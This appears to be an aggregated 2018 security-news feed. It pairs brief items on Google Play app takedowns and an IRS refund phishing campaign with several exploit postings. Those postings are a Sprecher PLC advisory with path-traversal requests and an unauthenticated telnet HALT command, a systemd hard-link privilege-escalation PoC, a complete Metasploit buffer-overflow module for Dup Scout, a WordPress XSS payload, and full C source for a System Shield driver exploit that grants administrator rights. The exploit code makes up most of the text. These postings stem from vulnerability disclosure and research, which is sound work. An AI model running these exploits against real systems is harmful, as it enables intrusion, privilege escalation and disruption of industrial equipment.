Google Booted 700,000 Bad Apps From Its Marketplace in 2017

Google set the record straight on Android security Tuesday, announcing that in 2017 it booted 700,000 apps from Google Play for violating marketplace policies.

In a blog post titled “How we fought bad apps and malicious developers in 2017,” Google outlined efforts made over the last 12 months to keep users safe.

“Last year we’ve more than halved the probability of a user installing a bad app, protecting people and their devices from harm’s way, and making Google Play a more challenging place for those who seek to abuse the app ecosystem for their own gain,” wrote Andrew Ahn, product manager at Google Play, in a blog post Tuesday.

Other data points include 99 percent of apps with “abusive contents” were singled out and rejected before a user could install them, Google said. Over 100,000 “bad developers” were removed from the Google marketplace, it added. Google also said it booted 70 percent more rogue apps in 2017 than in 2016.

Bad apps ranged from ones with inappropriate content, those identified as potentially harmful applications and others that were copycat apps that simply existed to trick users into downloading them with confusable icons similar to popular apps.

Some of those rogue apps included 22 Android flashlight and utility apps removed earlier this month that “generated illegal ad revenue.” In December, sixty “AdultSwine” apps were booted from Play that in some cases generated pornographic ads on apps aimed at children.

Many of Google’s security gains are attributed to a series of initiatives rolled out over the past year.

Last May, Google introduced Play Protect, a security feature that maintains some oversight on content downloaded to Android devices. For example, previously downloaded apps can be continually scanned for malicious behaviors as a counter to developers who push benign apps to Google Play that later connect and download malicious components. This also helps provide a line of defense against apps downloaded from third-party stores that aren’t subject to Google’s malware scanners. Google Play Protect is capable of scanning and verifying up to 50 billion apps on a daily basis.

Google Play Protect is also a cornerstone security measure in Android 8.0, known as Oreo, along with Project Treble, which is expected to go a long way toward improving the scattered patching and update process now hindering Android security.

More recently, in December Google announced plans to further crack down on unwanted and harmful Android apps as part of an expansion of its Google Safe Browsing mission. Starting at the end of January, Google said last month, it will begin delivering warnings to users of apps and websites deemed in violation of its policies.

“Despite the new and enhanced detection capabilities that led to a record-high takedowns of bad apps and malicious developers, we know a few still manage to evade and trick our layers of defense. We take these extremely seriously, and will continue to innovate our capabilities to better detect and protect against abusive apps and the malicious actors behind them,” Ahn wrote.

While many of Google’s security wins trace back to itself, the company has also placed an increased emphasis on rewarding external researchers for finding vulnerable apps on the Google Play marketplace. In October 2017, Google took the long-awaited step of instituting a public bug bounty focused on finding vulnerabilities in popular mobile apps housed on Google Play. The program compliments Google’s Android Security Rewards program, which began in 2015 and focused on Google’s Nexus and Pixel phones.

Cybercriminals target early IRS 2018 refunds now

On Monday, Jan 29th, IRS officially opened its 2018 season. Some taxpayers already filed their taxes and cybercriminals know it too. So, right after two days of the official 2018 season opening, we got phishing messages with a fake refund status Websites:

The link in the email leads to a hacked Brazilian restaurant, redirecting to Website with Australian domain zone.

So, the whole scheme is to steal credit card information of the taxpayers expecting a tax refund from IRS. Both URLs are blocked by Kaspersky Anti-Phishing now.

The mentioned Website was hacked and includes an old Webshell uploaded back to 2016.

Should we expect more campaigns like this? Definitely yes. Stay watchful and don’t lose your refunds!

Sprecher Automation SPRECON-E-C / PU-2433 Traversal / DoS

SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
vulnerable version: <8.49 (most vulnerabilities, see “Vulnerable version” for
details)
fixed version: 8.49 (most vulnerabilities, see “Solution” for details)
CVE number: –
impact: Medium
homepage: https://www.sprecher-automation.com
found: 2017-08-15
by: T. Weber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal – Moscow
Kuala Lumpur – Singapore – Vienna (HQ) – Vilnius – Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
——————-
“Sprecher Automation GmbH offers switchgears and automation solutions
for energy, industry and infrastructure processes. Our customers are
power utilities, industries, transportation companies, municipal
utilities and public institutions.

Company-own developments and cooperations with technology
partners lead to a unique product portfolio consisting of traditional
electrical technologies as well as high-tech electronics.”

Source: https://www.sprecher-automation.com/en/

Business recommendation:
————————
SEC Consult recommends to immediately patch the systems and follow the
hardening guide provided by the vendor (SEC Consult did not have access to the
hardening guide in order to review it).

A thorough security review should be performed by security professionals as
further security issues might exist within the product.

Vulnerability overview/description:
———————————–
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal
vulnerability. A user which is authenticated on the web interface,
which is intended as read-only interface, can download files with the
permissions of the webserver (www-data).

Files like “/etc/shadow” are not readable for the webserver.

2) Client-Side Password Hashing
The password hashes which are stored on the system can be directly
used to authenticate on the web interface (pass-the-hash) since the password
is hashed in the browser of the user during login.

3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048.
This interface can be used to control the PLC and does not require any
authentication.

4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large amount of ports triggers a denial
of service of the PLC service. This results in an persistent DoS of the
standby PLC in an active – standby pair. Manual operator intervention is
required to restore service availability.

5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses
is used for the PLC base operating system.

Proof of concept:
—————–
1) Authenticated Path Traversal Vulnerability
Reading “passwd” is possible by triggering the following request:
——————————————————————————-
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host: <IP-Address>
Cookie: sid=<SESSION-ID>
Connection: close
Upgrade-Insecure-Requests: 1
——————————————————————————-

The file is directly fetched from the system:
——————————————————————————-
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[…]
——————————————————————————-

2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the
device. Therefore the hash is as good as the password.

The following request shows a login process:
——————————————————————————-
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host: <IP-Address>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http://<IP-Address>/Webserver.html?locale=de
Content-Length: 57
Connection: close

cgi_time&user=admin&pswd=<md5-hash>
——————————————————————————-

3) Missing Authentication
An administrative interface was presented after connecting to port 2048 via
Telnet:
$ telnet <IP-Address> 2048

100 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $
Scheduling mode: application timer/timer-tick preserving
Copyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.
HELP
104 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $
Scheduling mode: application timer/timer-tick preserving
Copyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.
HELP, ? …………………….. show this help
QUIT, EXIT ………………….. quit command session
STOP ……………………….. stop execution
CONT [TASK|EP] <id> ………….. continue execution
STRT ……………………….. start system
REST ……………………….. restart system if breaked
HALT ……………………….. quit scheduler
SHOW [TASKS|SCHED|REVISIONS] ….. show information
SHOW [BREAKPOINTS] …………… show breakpoint list
EXEC <TASK> <id> …………….. execute a task
EXEC_MS <ms> [flags] …………. execute code for a specific time
EXEC_CYCLES <no> [flags] ……… execute code for cycles
STEP TASK <id> <INTO|OVER|OUT> … single step (task)
STEP EP <id> <INTO|OVER|OUT> ….. single step (task of EP)
ADD_BREAKPOINT <bp> ………….. add breakpoint
DELETE_BREAKPOINT <bp|ALL> ……. delete breakpoints
ENABLE_BREAKPOINT <bp|ALL> ……. enable breakpoints
DISABLE_BREAKPOINT <bp|ALL> …… disable breakpoints
READ <variable> ……………… read variable as string
READ_LONG <variable> …………. read variable as long
READ_DOUBLE <variable> ……….. read variable as double
WRITE <variable> <value> ……… write variable with string const.
WRITE_LONG <variable> <value> …. write variable with long value
WRITE_DOUBLE <variable> <value> .. write variable with double value
GET_LONGNAME <variable> ………. get variable information
GET_TYPENAME <variable> ………. get variable information
CHECK_VAR <variable> …………. check if variable exists
USER name …………………… identify user
PASS pw …………………….. authenticate with password
BIN ………………………… switch to binary protocol mode

The PLC can be restarted with the “HALT” command (PLC returns after about 30 seconds):

HALT
200 OK: shutting down application tasks
201 OK: waiting for application tasks
202 OK: shutting down system
Connection closed by foreign host.

4) Permanent Denial of Service via Portscan
An aggressive portscan triggered a persistent denial of service of the standby PLC
in an active – standby setup.

5) Outdated Linux Kernel
By using the path traversal vulnerability (1) the Linux kernel version has been
retrieved:
——————————————————————————-
Linux version 2.6.20-sp16 ([email protected]) (gcc version 4.4.6 (Buildroot 2011.05))
#1 PREEMPT Mon Feb 29 12:06:28 CET 2016
——————————————————————————-

Vulnerable versions:
—————————–
The following versions are affected by the identified vulnerabilities:
1) Authenticated Path Traversal Vulnerability
all versions < 8.49

2) Client-Side Password Hashing
all versions < 8.49

3) Missing Authentication
all versions

4) Permanent Denial of Service via Portscan
all versions

5) Outdated Linux Kernel
all versions < 8.49

Vendor contact timeline:
————————
2017-09-22: Requesting vendor security contact and encryption keys
2017-09-25: Vendor provides S/MIME certificate for encryption
2017-09-25: Advisory is submitted to the vendor
2017-09-25: Call with vendor contact. Contact states that the vulnerabilities
are known and fixed in different newer firmware versions.
Contact will provide a list of firmware versions with the fixes.
2017-10-02: Requesting update.
2017-10-02: Vendor states they will provide feedback by the following week.
2017-10-12: SEC Consult sends reminder for requested information.
2017-10-13: Vendor states they will provide missing information until 2017-10-20.
2017-10-20: Vendor requested some more time (2017-11-03) to prepare hardening
guide to be linked in advisory.
2017-11-03: Vendor provides affected and fixed versions, workaround information
and reference to hardening guideline
2018-01-29: Vendor provides an update regarding the hardening guide document ID.
It was changed to from 94.2.915.95 to 94.2.913.50.
2018-01-30: Vendor requested changes for the “passwd” file in the advisory.
Removed the Vendor-specific user accounts in the PoC.
2018-01-31: Coordinated public release.

Solution:
———
1) Authenticated Path Traversal Vulnerability
Fixed in version 8.49 (available since 2016-05-13)

2) Client-Side Password Hashing
Fixed in version 8.49 (available since 2016-05-13)

3) Missing Authentication
see workaround

4) Permanent Denial of Service via Portscan
see workaround

5) Outdated Linux Kernel
Fixed in version 8.49 (available since 2016-05-13)

Workaround:
———–
1) Authenticated Path Traversal Vulnerability
As a workaround, if a firmware update is not feasible due to operational constraints,
the webserver can be deactivated. The webserver is not necessary for operation,
as all maintenance can be done via the SPRECON-E service program.

2) Client-Side Password Hashing
see (1)

3) Missing Authentication
Remote debugging of the Software-PLC is possible via the “secure service channel”
instead of this Telnet service.
The optional Telnet service can be disabled to mitigate this vulnerability.
(According to the vendor it is disabled by default.)

See the vendor’s hardening guideline available for all registered customers:
https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).

4) Permanent Denial of Service via Portscan
According to the vendor the denial of service via portscan can be mitigated using
the packet filter.

See the vendor’s hardening guideline available for all registered customers:
https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).

5) Outdated Linux Kernel
no workaround available

Advisory URL:
————-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok – Berlin – Linz – Luxembourg – Montreal – Moscow
Kuala Lumpur – Singapore – Vienna (HQ) – Vilnius – Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T.Weber / @2018

systemd Local Privilege Escalation

Product: systemd (systemd-tmpfiles)
Versions-affected: 236 and earlier
Author: Michael Orlitzky
Fixed-in: commit 5579f85 , version 237
Bug-report: https://github.com/systemd/systemd/issues/7736
Acknowledgments: Lennart Poettering who, instead of calling me an idiot
for not realizing that systemd enables fs.protected_hardlinks by
default, went out of his way to harden the non-default configuration.

== Summary ==

Before version 237, the systemd-tmpfiles program will change the
permissions and ownership of hard links. If the administrator disables
the fs.protected_hardlinks sysctl, then an attacker can create hard
links to sensitive files and subvert systemd-tmpfiles, particularly
with “Z” type entries.

Systemd as PID 1 with the default fs.protected_hardlinks=1 is safe.

== Details ==

When running as PID 1, systemd enables the fs.protected_hardlinks
sysctl by default; that prevents an attacker from creating hard links
to files that he can’t write to. If, however, the administrator should
decide to disable that sysctl, then hard links may be created to any
file (on the same filesystem).

Before version 237, the systemd-tmpfiles program will voluntarily
change the permissions and ownership of a hard link, and that is
exploitable in a few scenarios. The most problematic and easiest to
exploit is the “Z” type tmpfiles.d entry, which changes ownership and
permissions recursively. For an example, consider the following
tmpfiles.d entries,

d /var/lib/systemd-exploit-recursive 0755 mjo mjo
Z /var/lib/systemd-exploit-recursive 0755 mjo mjo

Whenever systemd-tmpfiles is run, those entries make mjo the owner of
everything under and including /var/lib/systemd-exploit-recursive. After
the first run, mjo can create a hard link inside that directory pointing
to /etc/passwd. The next run (after a reboot, for example) changes the
ownership of /etc/passwd.

A proof-of-concept can be run from the systemd source tree, using
either two separate terminals or sudo:

root # sysctl -w fs.protected_hardlinks=0
root # sysctl -w kernel.grsecurity.linking_restrictions=0
root # ./build/systemd-tmpfiles –create
mjo $ ln /etc/passwd /var/lib/systemd-exploit-recursive/x
root # ./build/systemd-tmpfiles –create
mjo $ /bin/ls -l /etc/passwd
-rwxr-xr-x 2 mjo mjo 1504 Dec 20 14:27 /etc/passwd

More elaborate exploits are possible, and not only the “Z” type is
vulnerable.

== Resolution ==

The recursive change of ownership/permissions does not seem to be safely
doable without fs.protected_hardlinks enabled.

In version 237 and later, systemd-tmpfiles calls fstatat() immediately
after obtaining a file descriptor from open():

fd = open(path, O_NOFOLLOW|O_CLOEXEC|O_PATH);
if (fd < 0) {

}
if (fstatat(fd, “”, &st, AT_EMPTY_PATH) < 0)

The st->st_nlink field is then checked to determine whether or not fd
describes a hard link. If it does, the ownership/permissions are not
changed, and an error is displayed:

if (hardlink_vulnerable(&st)) {
log_error(“Refusing to set permissions on hardlink…”, path);
return -EPERM;
}

There is still a tiny window between open() and fstatat() where the
attacker can fool this countermeasure by removing an existing hard
link to, say, /etc/passwd. In that case, st->st_nlink will be 1, but
fd still references /etc/passwd. The attack succeeds, but is much
harder to do, and the window is as narrow as possible. More to the
point, it seems unavoidable when implementing the tmpfiles.d
specification.

== Mitigation ==

Leave the fs.protected_hardlinks sysctl enabled

Dup Scout Enterprise 10.4.16 Import Command Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Dup Scout Enterprise v10.4.16 – Import Command Buffer Overflow’,
‘Description’ => %q(
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
by using the import command option to import a specially crafted xml file.
),
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Daniel Teixeira’
],
‘References’ =>
[
[ ‘CVE’, ‘2017-7310’ ]
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘seh’,
‘DisablePayloadHandler’ => ‘true’
},
‘Platform’ => ‘win’,
‘Payload’ =>
{
‘BadChars’ => “\x00\x01\x02\x0a\x0b\x0c\x22\x27”,
‘StackAdjustment’ => -3500
},
‘Targets’ =>
[
[‘Windows Universal’, { ‘Ret’ => 0x651BB77A } ]
],
‘Privileged’ => false,
‘DisclosureDate’ => ‘Mar 29 2017’,
‘DefaultTarget’ => 0))

register_options(
[
OptString.new(‘FILENAME’, [true, ‘The file name.’, ‘msf.xml’])
])
end

def exploit
esp = “\x8D\x44\x24\x4C” # LEA EAX, [ESP+76]
jmp = “\xFF\xE0” # JMP ESP

buffer = “<?xml version=\”1.0\” encoding=\”UTF-8\”?>\n<classify\nname=\'”
buffer << “\x90” * 1560
buffer << [target.ret].pack(‘V’)
buffer << “\x90” * 16
buffer << esp
buffer << jmp
buffer << “\x90” * 70
buffer << payload.encoded
buffer << “\x90” * 5000
buffer << “\n</classify>”

print_status(“Creating ‘#{datastore[‘FILENAME’]}’ file …”)
file_create(buffer)
end
end

WordPress Propertyhive 1.4.14 Cross Site Scripting

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Propertyhive 1.4.14

Propertyhive is prone to a stored cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the value body is not filter correctly:

Demo Request POST:

POST
/wordpress/wp-content/plugins/propertyhive/includes/admin/views/html-preview-applicant-matches-email.php
HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: es-ES,es;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

body=<script>alert(“R1XS4.COM”)</script>

System Shield 5.0.0.136 Privilege Escalation

/*

Exploit Title – System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation
Date – 29th January 2018
Discovered by – Parvez Anwar (@parvezghh)
Vendor Homepage – http://www.iolo.com/
Tested Version – 5.0.0.136
Driver Version – 5.4.11.1 – amp.sys
Tested on OS – 64bit Windows 7 and Windows 10 (1709)
CVE ID – CVE-2018-5701
Vendor fix url –
Fixed Version – 0day
Fixed driver ver – 0day

Check blogpost for details:

Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege

*/

#include <stdio.h>
#include <windows.h>
#include <aclapi.h>

#pragma comment(lib,”advapi32.lib”)

#define MSIEXECKEY “MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver”

#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)

typedef unsigned __int64 QWORD;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
QWORD Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);

QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;

if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf(“\n[-] OpenProcessToken() failed (%d)\n”, GetLastError());
return -1;
}

NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(“ntdll.dll”), “NtQuerySystemInformation”);

if (!NtQuerySystemInformation)
{
printf(“[-] Unable to resolve NtQuerySystemInformation\n\n”);
return -1;
}

do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);

printf(“\n[i] Current process id %d and token handle value %u”, MyProcessID, hToken);

for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{

if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
{
TokenAddress = pSysHandleInfo->Handles[i].Object;
}
}

HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}

int TakeOwnership()
{
HANDLE token;
PTOKEN_USER user = NULL;
PACL pACL = NULL;
EXPLICIT_ACCESS ea;
DWORD dwLengthNeeded;

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token))
{
printf(“\n[-] OpenProcessToken failed %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] OpenProcessToken successful”);

if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf(“\n[-] Failed to initialize GetTokenInformation %d\n\n”, GetLastError());
ExitProcess(1);
}

user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded);

if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded))
{
printf(“\n[-] GetTokenInformation failed %d\n\n”, GetLastError());
ExitProcess(1);
}

ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

// build DACL

ea.grfAccessPermissions = KEY_ALL_ACCESS;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = (LPTSTR)user->User.Sid;

if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS)
{
printf(“\n[-] SetEntriesInAcl failure\n\n”);
ExitProcess(1);
}
printf(“\n[+] SetEntriesInAcl successful”);

// Take ownership

if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS)
{
printf(“\n[-] Failed to obtain the object’s ownership %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] Ownership ‘%s’ successful”, MSIEXECKEY);

// Modify DACL

if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS)
{
printf(“\n[-] Failed to modify the object’s DACL %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] Object’s DACL successfully modified”);

LocalFree(pACL);
CloseHandle(token);

return 0;
}

int RestorePermissions()
{
PACL pOldDACL = NULL;
PSID pSIDAdmin = NULL;
SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;

printf(“\n[*] Restoring all permissions and value”);

// Restore registry value

WriteToRegistry(“%systemroot%\\system32\\msiexec.exe /V”);

// Sid for the BUILTIN\Administrators group

if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pSIDAdmin))
{
printf(“\nAllocateAndInitializeSid failed %d\n\n”, GetLastError());
ExitProcess(1);
}

// Restore key ownership

if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS)
{
printf(“\n[-] Failed to restore the object’s ownership %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] Object’s ownership successfully restored”);

// Take copy of parent key

if (GetNamedSecurityInfo(“MACHINE\\SYSTEM\\CurrentControlSet\\Services”, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS)
{
printf(“\n[-] Failed to copy parent key object’s DACL %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] Parent key object’s DACL successfully saved”);

// Restore key permissions

if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS)
{
printf(“\n[-] Failed to restore the object’s DACL %d\n\n”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] Object’s DACL successfully restored”);

FreeSid(pSIDAdmin);

return 0;
}

int WriteToRegistry(char command[])
{
HKEY hkeyhandle;

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\services\\msiserver”, 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS)
{
printf(“\n[-] Registry key failed to open %d\n\n”, GetLastError());
ExitProcess(1);
}

if (RegSetValueEx(hkeyhandle, “ImagePath”, 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS)
{
printf(“\n[-] Registry value failed to write %d\n\n”, GetLastError());
ExitProcess(1);
}

printf(“\n[+] Registry key opened and value modified”);

RegCloseKey(hkeyhandle);

return 0;
}

int TriggerCommand()
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
si.cb = sizeof(si);

if (!CreateProcess(NULL, “c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet”, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
{
printf(“\n[-] CreateProcess failed %d”, GetLastError());
ExitProcess(1);
}
printf(“\n[+] c:\\windows\\system32\\msiexec.exe launched”);
printf(“\n[i] Account should now be in the local administrators group”);

CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);

return 0;
}

int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
QWORD inbuffer1[3] = {0};
QWORD inbuffer2[3] = {0};
QWORD ptrbuffer[1] = {0}; // QWORD4 – Has to be 0 for arbitrary write value to be 0xfffffffe
DWORD currentusersize;
char currentuser[100];
char netcommand[MAX_PATH];

printf(“——————————————————————————-\n”);
printf(” System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit \n”);
printf(” Tested on 64bit Windows 7 / Windows 10 (1709) \n”);
printf(“——————————————————————————-\n”);

TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf(“\n[i] Address of current process token 0x%p”, TokenAddress);

TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf(“\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten”, TokenAddressTarget);

inbuffer1[0] = 0x8; // QWORD1 – Cannot be more than 8. Also different values (<9) calculates to different sub calls
inbuffer1[1] = ptrbuffer; // QWORD2 – Address used for read and write
inbuffer1[2] = TokenAddressTarget+1; // QWORD3 – Arbitrary write address !!!

inbuffer2[0] = 0x8;
inbuffer2[1] = ptrbuffer;
inbuffer2[2] = TokenAddressTarget+9;

sprintf(devhandle, “\\\\.\\%s”, “amp”);

hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

if(hDevice == INVALID_HANDLE_VALUE)
{
printf(“\n[-] Open %s device failed\n\n”, devhandle);
return -1;
}
else
{
printf(“\n[+] Open %s device successful”, devhandle);
}

printf(“\n[~] Press any key to continue . . .\n”);
getch();

DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL);

printf(“[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n”);
CloseHandle(hDevice);

currentusersize = sizeof(currentuser);

if (!GetUserName(currentuser, &currentusersize))
{
printf(“\n[-] Failed to obtain current username: %d\n\n”, GetLastError());
return -1;
}

printf(“[*] Adding current user ‘%s’ account to the local administrators group”, currentuser);

sprintf(netcommand, “net localgroup Administrators %s /add”, currentuser);

TakeOwnership();
WriteToRegistry(netcommand);
TriggerCommand();
Sleep(1000);
RestorePermissions();
printf(“\n\n”);

return 0;
}

BMC BladeLogic RSCD Agent 8.3.00.64 Windows Users Disclosure

# Exploit Title: BMC BladeLogic RSCD agent get Windows users
# Filename: BMC_winUsers.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-27
